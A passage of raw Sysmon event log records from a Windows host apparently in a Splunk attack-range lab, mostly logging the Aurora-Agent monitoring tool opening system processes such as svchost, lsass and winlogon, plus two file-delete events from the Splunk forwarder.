Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017119Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.786{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017118Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.784{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017117Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.779{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017116Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.775{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017115Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.774{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017114Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.772{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017113Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.765{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017112Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.764{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017111Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.762{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017110Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.760{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017109Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.754{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017108Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017107Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.747{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017106Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.739{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017105Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.737{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017104Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.727{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017103Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.723{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017102Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.693{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017101Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.684{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017100Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.672{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017099Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.660{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017098Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.632{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017097Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.596{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017096Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.591{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017095Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.584{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017094Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.576{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017093Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.567{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017092Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.557{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000017091Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.550{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000017090Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.547{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 23542300x800000000000000017089Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.183{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0EAE8902DADDC029DCB5C2919EF821D,SHA256=70AE9512F8CFA4D80AEE892A132466448E6D5414CEAE3CBC384E87D18B40D638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:23.283{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 